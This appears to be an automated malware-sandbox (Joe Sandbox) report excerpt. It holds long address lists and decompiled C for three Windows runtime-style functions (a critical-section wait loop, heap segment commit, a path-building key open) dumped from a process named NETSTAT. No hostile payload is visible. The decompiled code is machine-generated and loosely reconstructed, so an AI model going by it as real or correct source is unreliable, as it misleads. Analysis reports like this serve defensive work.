0x02e92598
0x02e92599
0x02e9259e
0x02e925a4
0x02e925a9
0x02e925ac
0x02e925ae
0x02e925b1
0x02e925b2
0x02e925b5
0x02e925b8
0x02e925bb
0x02e925bc
0x02e925bf
0x02e925c2
0x02e925c5
0x02e925c6
0x02e925cb
0x02e925ce
0x02e925d8
0x02e925dd
0x02e925de
0x02e925e1
0x02e925e3
0x02e925e9
0x02e926da
0x02e926da
0x02e926dd
0x02e926e2
0x02ed5b56
0x00000000
0x02e926e8
0x02e926f9
0x02e926fb
0x02e926fe
0x02e92700
0x02ed5b60
0x00000000
0x02e92706
0x02e92706
0x02e9270a
0x02e9270a
0x02e9270d
0x02e92713
0x02e92716
0x02e92718
0x02e9271c
0x02e9271e
0x02ed5b6c
0x02ed5b6f
0x02ed5b7f
0x02ed5b89
0x02ed5b8e
0x02ed5b93
0x02ed5b96
0x02ed5b9c
0x02ed5ba0
0x02ed5ba3
0x02ed5bab
0x02ed5bb0
0x02ed5bb3
0x02ed5bb3
0x02ed5ba3
0x02e92724
0x02e92726
0x02e92729
0x02e9272c
0x02e9279d
0x02e9279d
0x02e927a0
0x02e927a2
0x00000000
0x02e9272e
0x02e9272e
0x02e92731
0x02e92734
0x02e92734
0x02e92736
0x02ed5bc1
0x02ed5bc1
0x02ed5bc4
0x00000000
0x02ed5bca
0x02ed5bca
0x02ed5bcd
0x00000000
0x02ed5bd3
0x00000000
0x02ed5bd3
0x02ed5bcd
0x02e9273c
0x02e9273c
0x02e92742
0x02e92747
0x02e9274a
0x02e9274d
0x02e92750
0x00000000
0x02e92756
0x02e92756
0x00000000
0x02e92902
0x02e92908
0x02e9290b
0x00000000
0x02e92911
0x02e9291c
0x02e92921
0x00000000
0x02e92921
0x00000000
0x00000000
0x02e92880
0x02e92887
0x02e9288c
0x00000000
0x00000000
0x02e92805
0x02e9280a
0x02e92814
0x02e92816
0x00000000
0x00000000
0x02e9281e
0x02e92821
0x02e92823
0x00000000
0x02e92829
0x02e92829
0x02e92831
0x02e9283c
0x02e9283e
0x00000000
0x02e9283e
0x00000000
0x00000000
0x02e9284e
0x02e92850
0x02e92851
0x02e92854
0x02e92857
0x02e9285a
0x02e9285c
0x02e9285d
0x00000000
0x00000000
0x02e9275d
0x02e92761
0x00000000
0x02e92767
0x02e9276e
0x02e92773
0x02e92773
0x02e92776
0x02e92778
0x02e9277e
0x02e9277e
0x02e92781
0x02e92781
0x02e92783
0x02e92784
0x00000000
0x00000000
0x02ed5bd8
0x02ed5bde
0x02ed5be4
0x02ed5be6
0x02ed5be8
0x02ed5be9
0x02ed5bee
0x02ed5bf8
0x02ed5bff
0x02ed5c01
0x02ed5c04
0x02ed5c07
0x02ed5c0b
0x02ed5c0d
0x02ed5c0d
0x02ed5c15
0x02ed5c18
0x02ed5c1b
0x02ed5c1b
0x02ed5c1e
0x00000000
0x00000000
0x02e928c3
0x02e928c8
0x02e928d2
0x02e928d4
0x02e928d8
0x02e928db
0x02ed5c26
0x02ed5c28
0x02ed5c2d
0x02ed5c2d
0x00000000
0x00000000
0x02ed5c34
0x02ed5c36
0x02ed5c49
0x02ed5c4e
0x02ed5c54
0x02ed5c5b
0x02ed5c5d
0x02ed5c60
0x02e92788
0x02e92788
0x02e9278b
0x02e9278e
0x02e9278e
0x02e9278e
0x02e92791
0x00000000
0x00000000
0x02e92756
0x02e92750
0x00000000
0x02e92794
0x02e92794
0x02e92795
0x02e92798
0x02e92798
0x00000000
0x02e92734
0x02e9272c
0x02e92700
0x02e925ef
0x02e925ef
0x02e925ef
0x02e925f2
0x02e925f8
0x00000000
0x00000000
0x02e925fe
0x00000000
0x02e928e6
0x02e928ec
0x02e928ef
0x02e928f5
0x02e928f8
0x02e928f8
0x00000000
0x02e928f8
0x00000000
0x00000000
0x02e92866
0x02e92866
0x02e92876
0x02e92879
0x00000000
0x00000000
0x02e927e0
0x02e927e7
0x02e927e9
0x02e927eb
0x02ed5afd
0x00000000
0x02ed5afd
0x00000000
0x00000000
0x02e92633
0x02e92638
0x02e9263b
0x02e9263c
0x02e9263e
0x02e92640
0x02e92642
0x02e92647
0x02e92649
0x02e9264e
0x02e92650
0x02e92653
0x02e92659
0x02e926a2
0x02e926a7
0x02e926ac
0x02e926b2
0x02ed5b11
0x02ed5b15
0x02ed5b17
0x00000000
0x02e926b8
0x02e926b8
0x02e926ba
0x02e927a6
0x02e927a6
0x02e927a9
0x02e927ab
0x02e927b9
0x02e927b9
0x02e927be
0x02e927c1
0x02e927c3
0x02e927c5
0x02e927c7
0x02ed5c74
0x02ed5c79
0x02ed5c79
0x02e927c7
0x00000000
0x02e926c0
0x02e926c0
0x02e926c3
0x02e926c6
0x02e926c6
0x02e926c9
0x02e926c9
0x00000000
0x02e926c9
0x02e926ba
0x02e9265b
0x02e9265b
0x02e9265e
0x02e92667
0x02e9266d
0x02e92677
0x02e9267c
0x02e9267f
0x02e92681
0x02ed5b49
0x02ed5b4e
0x02e927cd
0x02e927d0
0x02e927d1
0x02e927d2
0x02e927d4
0x02e927dd
0x02e92687
0x02e92687
0x02e9268a
0x02e9268b
0x02e9268e
0x02e9268f
0x02e92691
0x02e92696
0x02e92698
0x02e9269d
0x02e9269f
0x00000000
0x02e9269f
0x02e92681
0x00000000
0x00000000
0x02e92846
0x00000000
0x00000000
0x02e92605
0x02e9260a
0x02e9260c
0x02e92611
0x02e92616
0x02e92619
0x02e92619
0x02e9261e
0x00000000
0x02e92624
0x02e92627
0x02e92627
0x00000000
0x00000000
0x02ed5b1f
0x00000000
0x00000000
0x02e92894
0x02e9289b
0x02e9289d
0x02e928a1
0x02ed5b2b
0x02ed5b2e
0x02ed5b2e
0x02e928a7
0x02e928a9
0x02ed5b04
0x02ed5b09
0x02ed5b09
0x02ed5b09
0x00000000
0x00000000
0x02ed5b35
0x02ed5b3c
0x02e928fb
0x02e928fb
0x02e926cc
0x02e926cc
0x02e926d0
0x00000000
0x02e926d2
0x02e926d2
0x00000000
0x02e926d2
0x00000000
0x00000000
0x02e925fe
0x02e9292d
0x02e92930
0x02e92935
0x02e92937
0x02e9293e
0x02e9293f
0x02e92947
0x02e9294f
0x02e92957
0x02e92962
0x02e92963
0x02e9296b
0x02e92972
0x02e92973
0x02e9297b
0x02e9297e
0x02e9297f
0x02e92980
0x02e92981
0x02e92982
0x02e92983
0x02e92984
0x02e92985
0x02e92986
0x02e92987
0x02e92988
0x02e92989
0x02e9298a
0x02e9298b
0x02e9298c
0x02e9298d
0x02e9298e
0x02e9298f
0x02e92990
0x02e92992
0x02e92997
0x02e929a3
0x02e929a6
0x02e929ab
0x02e929ad
0x02e929b0
0x02e929b2
0x02ed5c80
0x02e929b8
0x02e929b8
0x02e929bb
0x02e929c0
0x02e929c5
0x02e929c6
0x02e929c6
0x02e929c9
0x02e929cb
0x00000000
0x00000000
0x02e929cd
0x02e929d0
0x02e929d9
0x02e929db
0x02e929dd
0x02e92a7f
0x02e92a84
0x02e92a87
0x02e92a89
0x02ed5ca1
0x02ed5ca3
0x00000000
0x02e92a8f
0x02e92a8f
0x00000000
0x02e92a8f
0x00000000
0x02e929e3
0x02e929e3
0x02e929e3
0x00000000
0x02e929e3
0x02e929dd
0x00000000
0x02e929db
0x02e929e6
0x02e929e9
0x02e929eb
0x02e929ed
0x02e929f3
0x02e929f5
0x02e929f8
0x02e929fa
0x02e92a97
0x02e92a9a
0x02e92a9d
0x02e92add
0x00000000
0x02e92a9f
0x02e92aa2
0x02e92aa5
0x02e92aa8
0x02e92aab
0x02ed5cab
0x02ed5caf
0x02ed5cc5
0x02ed5cda
0x02ed5cdc
0x02ed5cdf
0x02ed5ce5
0x00000000
0x02ed5ceb
0x02ed5ced
0x02ed5cee
0x00000000
0x02ed5cee
0x02ed5cb1
0x02ed5cb4
0x02ed5cb9
0x02ed5cbb
0x00000000
0x02ed5cbd
0x02ed5cbd
0x00000000
0x02ed5cbd
0x02ed5cbb
0x02e92ab1
0x02e92ab1
0x02e92ac4
0x02e92ac6
0x02e92ac6
0x00000000
0x02e92ac6
0x02e92aab
0x00000000
0x02e92a00
0x02e92a09
0x02e92a0e
0x02e92a21
0x02e92a24
0x02e92a35
0x02e92a3a
0x02e92a3d
0x02e92a42
0x02e92a59
0x02e92a59
0x02e92a5c
0x02e92a5f
0x02e92a5f
0x02e929fa
0x02e929f3
0x02e92a64
0x02e92a64
0x02e92a6b
0x02e92a6b
0x02e92a6d
0x02e92a72
0x02e92a72
0x00000000

Strings

PATH, xrefs: 02E92642, 02E92691

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 35adb0eb3d56aabba80d230fade28e7f2615e2867d34ba067fa96f9a603a777e
Instruction ID: 035a2fa03768706c10679d8a1a4d6cd54f6a8f41d39a7c9758ecfe284dde659e
Opcode Fuzzy Hash: 35adb0eb3d56aabba80d230fade28e7f2615e2867d34ba067fa96f9a603a777e
Instruction Fuzzy Hash: 53C17CB5D80219AFCF25DF98D890BEEB7B5FF48744F44902AEA01BB250D735A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02E62D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E02E62D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x2f55350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x2f57bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E02EA97C0();
				}
				if( *0x2f579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x2f579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E02E91624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E02E87D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E02EFFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E02EA9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E02E9E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L02EBDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x2f56901;
								_push(_t109);
								_v52 = _t98;
								if( *0x2f56901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E02EA9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E02EA95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E02E87D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E02E87D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E02EE7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E02EFFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x2f55350;
							if(_t109 != 0x2f55350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E02EFFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E02EF5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x02e62d8a
0x02e62d8a
0x02e62d92
0x02e62d96
0x02e62d9e
0x02e62da0
0x02e62da3
0x02e62da5
0x02e62da8
0x02e62dab
0x02e62db2
0x02ebf9aa
0x02ebf9ab
0x02ebf9ae
0x02ebf9ae
0x02e62db8
0x02e62dc2
0x02ebf9b9
0x02ebf9be
0x02ebf9bf
0x02ebf9bf
0x02e62dcf
0x02ebf9c9
0x02e62dd5
0x02e62dd5
0x02e62dd5
0x02e62dde
0x02e62de1
0x02e62e70
0x02e62e72
0x02e62e72
0x02e62de7
0x02e62deb
0x02e62e7c
0x02e62e83
0x02e62e85
0x02e62e8b
0x02e62e8d
0x02e62e92
0x02e62e92
0x02e62e85
0x02e62df1
0x02e62df7
0x02e62df9
0x02e62df9
0x02e62dfc
0x02e62dff
0x02e62e02
0x00000000
0x02e62e05
0x02e62e0c
0x02ebf9d9
0x02e62e12
0x02e62e12
0x02e62e12
0x02e62e1a
0x02ebf9e3
0x02ebf9e9
0x02ebf9f0
0x02ebf9f6
0x02ebf9f8
0x02ebf9f8
0x02ebf9f0
0x02e62e23
0x02ebfa02
0x02ebfa03
0x02ebfa05
0x02ebfa06
0x00000000
0x02e62e29
0x02e62e29
0x02e62e2e
0x02e62e34
0x02e62e3e
0x00000000
0x00000000
0x02e62e44
0x02e62e47
0x02e62e4d
0x00000000
0x00000000
0x02e62e4f
0x02e62e54
0x00000000
0x00000000
0x02e62e5a
0x02e62e5f
0x02e62e9a
0x02e62ea4
0x02e62ea5
0x02e62ea8
0x02e62eaf
0x02e62eb2
0x02e62eb5
0x02ebfae9
0x02ebfaeb
0x02ebfaed
0x02ebfaef
0x02ebfaf7
0x02ebfaf8
0x02ebfafd
0x02ebfaff
0x02ebfb04
0x02ebfb04
0x02ebfaff
0x02e62ec0
0x02e62ec4
0x02e62ec6
0x02e62ec8
0x02ebfb14
0x02ebfb18
0x02ebfb1e
0x02ebfb21
0x02ebfb21
0x02e62ece
0x02e62ece
0x02e62ece
0x02e62ed7
0x02e62e61
0x02e62e63
0x02ebfa6b
0x02ebfa71
0x02ebfa76
0x02ebfa78
0x02ebfa8a
0x02ebfa7a
0x02ebfa83
0x02ebfa83
0x02ebfa8f
0x02ebfa91
0x02ebfa97
0x02ebfa9d
0x02ebfaa4
0x02ebfaaa
0x02ebfaaf
0x02ebfab1
0x02ebfac3
0x02ebfab3
0x02ebfabc
0x02ebfabc
0x02ebfac8
0x02ebfacb
0x02ebfadf
0x02ebfadf
0x02ebfacb
0x02ebfaa4
0x02ebfa91
0x02e62e6f
0x02e62e6f
0x02e62e5f
0x02ebfa13
0x02ebfa15
0x02ebfa17
0x02ebfa1f
0x02ebfa21
0x02ebfa22
0x02ebfa25
0x02ebfa28
0x02ebfa2f
0x02ebfa2f
0x02ebfa2a
0x02ebfa2a
0x02ebfa2a
0x02ebfa31
0x02ebfa34
0x02ebfa36
0x02ebfa3c
0x02ebfa3e
0x02ebfa41
0x02ebfa43
0x02ebfa45
0x02ebfa45
0x02ebfa41
0x02ebfa3c
0x02ebfa4a
0x02ebfa4f
0x02ebfa51
0x02ebfa53
0x02ebfa56
0x02ebfa5b
0x02ebfa5e
0x00000000
0x02ebfa5e
0x02e62e23

Strings

RTL: Re-Waiting, xrefs: 02EBFA4A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 1397bab6469fcc6d049dcdfc39216a820e481f5e73bd6f5c271272d5153eec2d
Instruction ID: 52c8b64ede669302a69b5cc0212ffd435d62f4ff4931f1f5548a869e24a142f8
Opcode Fuzzy Hash: 1397bab6469fcc6d049dcdfc39216a820e481f5e73bd6f5c271272d5153eec2d
Instruction Fuzzy Hash: 15614530AC06049BDB27DBA8C848BBFB7A5EF06358F14E666FA15976D0C7309900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F30EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02F30EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E02F2FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E02F31074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E02EA9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E02F2A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E02F2A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x2f58b04 >> 0x14) + (_v44 -  *0x2f58b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E02E87D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02F2138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E02E87D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E02F1FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x2f58724 & 0x00000008) != 0) {
						E02F252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E02F315B5(0x2f58ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x02f30eb7
0x02f30eb9
0x02f30ec0
0x02f30ec2
0x02f30ecd
0x02f3105b
0x02f3105b
0x02f31061
0x02f31066
0x02f31066
0x02f3106b
0x02f31073
0x02f31073
0x02f30ed3
0x02f30ed6
0x02f30edc
0x02f30ee0
0x02f30ee7
0x02f30ef0
0x02f30ef5
0x02f30efa
0x02f30efc
0x02f30efd
0x02f30f03
0x02f30f04
0x02f30f06
0x02f30f07
0x02f30f09
0x02f30f0e
0x02f30f14
0x02f30f23
0x02f30f2d
0x02f30f34
0x02f30f34
0x02f30f14
0x02f30f52
0x00000000
0x00000000
0x02f30f58
0x02f30f73
0x02f30f74
0x02f30f79
0x02f30f7d
0x02f30f80
0x02f30f86
0x02f30fab
0x02f30fb5
0x02f30fc6
0x02f30fd1
0x02f30fe3
0x02f30fd3
0x02f30fdc
0x02f30fdc
0x02f30feb
0x02f31009
0x02f31009
0x02f31015
0x02f31027
0x02f31017
0x02f31020
0x02f31020
0x02f3102f
0x02f3103c
0x02f3103c
0x02f31048
0x02f31050
0x02f31050
0x02f31055
0x00000000
0x02f31055
0x02f30f88
0x02f30f9e
0x02f30fa2
0x02f30fa9
0x00000000
0x00000000
0x00000000
0x02f30fa9
0x00000000

Strings

`, xrefs: 02F30F16

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b5d71bfa6e07a01f994aa213e46d40ebf5e43bcaacfeef3c26b5d031db6f7220
Instruction ID: 50c6ab7ba2628f74a5b213ce4adbf31d703a32b031a30ec184a93804e9dda91b
Opcode Fuzzy Hash: b5d71bfa6e07a01f994aa213e46d40ebf5e43bcaacfeef3c26b5d031db6f7220
Instruction Fuzzy Hash: 8D51C4716043419FD326DF28D880F1BB7E6EBC5784F04092DFA9A97290D771E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02E9F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02E9F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E02E84120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E02EA9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E02EA9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E02EA95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x3f2bc81a
							_t109 = L02E84620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x20003f2b
								E02EAF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x20003f2b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E02EA95D0();
										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x02e9f0d3
0x02e9f0d9
0x02e9f0e0
0x02e9f0e7
0x02e9f0f2
0x02e9f0f4
0x02e9f0f8
0x02e9f100
0x02e9f108
0x02e9f10d
0x02e9f115
0x02e9f116
0x02e9f11f
0x02e9f123
0x02e9f124
0x02e9f12c
0x02e9f130
0x02e9f134
0x02e9f13d
0x02e9f144
0x02e9f14b
0x02e9f152
0x02edbab0
0x02edbab0
0x02e9f158
0x02e9f158
0x02e9f15a
0x02e9f160
0x02e9f165
0x02e9f166
0x02e9f16f
0x02e9f173
0x02edbaa7
0x02edbaa7
0x02edbaab
0x00000000
0x02e9f179
0x02e9f179
0x02e9f18d
0x02e9f191
0x02edbaa2
0x00000000
0x02e9f197
0x02e9f19b
0x02e9f1a2
0x02e9f1a9
0x02e9f1af
0x02e9f1b2
0x02e9f1b6
0x02e9f1b9
0x02e9f1c0
0x02e9f1c4
0x02e9f1d8
0x02e9f1df
0x02e9f1e3
0x02e9f1e6
0x02e9f1eb
0x02e9f1ee
0x02e9f1f4
0x02e9f20f
0x02edbab7
0x02edbabb
0x02edbacc
0x02edbad1
0x02e9f215
0x02e9f218
0x02e9f226
0x02e9f22b
0x00000000
0x02e9f22b
0x02e9f1f6
0x02e9f1f6
0x02e9f1f9
0x02e9f1fb
0x02e9f1fb
0x02e9f1f4
0x02e9f191
0x02e9f173
0x02e9f152
0x02e9f203

Strings

@, xrefs: 02E9F124

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
